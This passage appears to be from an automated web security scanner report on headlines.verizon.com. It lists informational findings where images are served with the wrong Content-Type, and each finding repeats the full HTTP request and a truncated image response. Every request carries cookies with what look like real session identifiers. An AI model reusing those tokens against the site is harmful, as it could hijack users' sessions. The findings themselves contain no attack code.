Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 543
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...:............e....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.m.0............d..!....#.#.+..G(#..^zY$...*./Y.......Q..R..../b.h&...o{...u]..0..cK]Em...........V..
...[SNIP]...

26.31. http://headlines.verizon.com/headlines/resources/images/navOff_04.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_04.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/navOff_04.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 556
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...B.........tKJ    ....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.m.@.M..@G...
d.2B..F......a.0B....>K....i../[....?xg.`....i.zs......p ...3..,......p.M..Z3.{.g.....t#
...[SNIP]...

26.32. http://headlines.verizon.com/headlines/resources/images/navOff_05.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_05.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/navOff_05.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 574
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...;.........~..[....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..V.m. ..U..#..................f.FhV`...zD'....O.....q......zU.........-`.W{_........{'..}...l!.w[#..mG..
...[SNIP]...

26.33. http://headlines.verizon.com/headlines/resources/images/navOff_06.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_06.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/navOff_06.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 547
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...A..........|.
....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W...0.MO]..X..`.t...F..`.F(#.+0B........D....l...q0..9.i.6.....).
... <....UU....}?;.........&.%.-....
...[SNIP]...

26.34. http://headlines.verizon.com/headlines/resources/images/navOff_07.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_07.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/navOff_07.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 503
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...:............e....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W...0..S....
Y!7.+..0...FhF(#...#.#pv.|.Yp.....K..qB^....4M.+.[."..F......_@Y..=....m.......Av..|.'..;Y
...[SNIP]...

26.35. http://headlines.verizon.com/headlines/resources/images/navOff_08.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOff_08.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/navOff_08.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 441
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...0.................gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...KIDATx..V.m. ......+..v.;..PG.#.... +..+0../.....V.._.%/ ...qGT....l/..[....w..[.]...Z1.....,...=.mY'...m..n.8.
...[SNIP]...

26.36. http://headlines.verizon.com/headlines/resources/images/navOn_01.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/navOn_01.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/navOn_01.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:04 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 1288
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...S..........'......gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..WKo.H..;.8.L.a..J.j.. .w$.'.8.'V .....C.IPx.x\ 7..!n....V".....DrA+m..0....c.....=.{C .=....].U_U.c[.
...[SNIP]...

26.37. http://headlines.verizon.com/headlines/resources/images/pageTitleHeadlines.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/pageTitleHeadlines.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/pageTitleHeadlines.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:16:26 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 929
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...a.........5..N....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...3IDATx..W..!A.]JBHHH*...T*..7..PJ(......r....s...u....Z.......jv.w......8.....x<z.W(......v...{.r.\6....RI}<..
...[SNIP]...

26.38. http://headlines.verizon.com/headlines/resources/images/primaryNavPipe.png

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/primaryNavPipe.png

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain a PNG image.

Request

GET /headlines/resources/images/primaryNavPipe.png HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; NEWSROOMDOTCOMAPPID=C2wVTlQhWhZTJgT6sl574LDMvplTc6PQJsryMW17PWjGSvv2qJ2y!-1366756756; WT_FPC=id=2d2e3ba6fdd517b830c1315269756381:lv=1315269756381:ss=1315269756381

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Last-Modified: Fri, 05 Mar 2010 04:17:16 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Length: 193
Date: Mon, 05 Sep 2011 22:42:36 GMT
Connection: close
Vary: Accept-Encoding

.PNG
.
...IHDR...............M.....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<...SIDATx.b...?....={VDJJ....a...1...    cpcH...?...L..C.......    ..    &..3....o@...x.z....0..-..........IEND.B`.

26.39. http://headlines.verizon.com/headlines/resources/images/tstories/tStoriesControl_pause.gif

Summary

Severity:   Information
Confidence:   Firm
Host:   http://headlines.verizon.com
Path:   /headlines/resources/images/tstories/tStoriesControl_pause.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /headlines/resources/images/tstories/tStoriesControl_pause.gif HTTP/1.1
Host: headlines.verizon.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
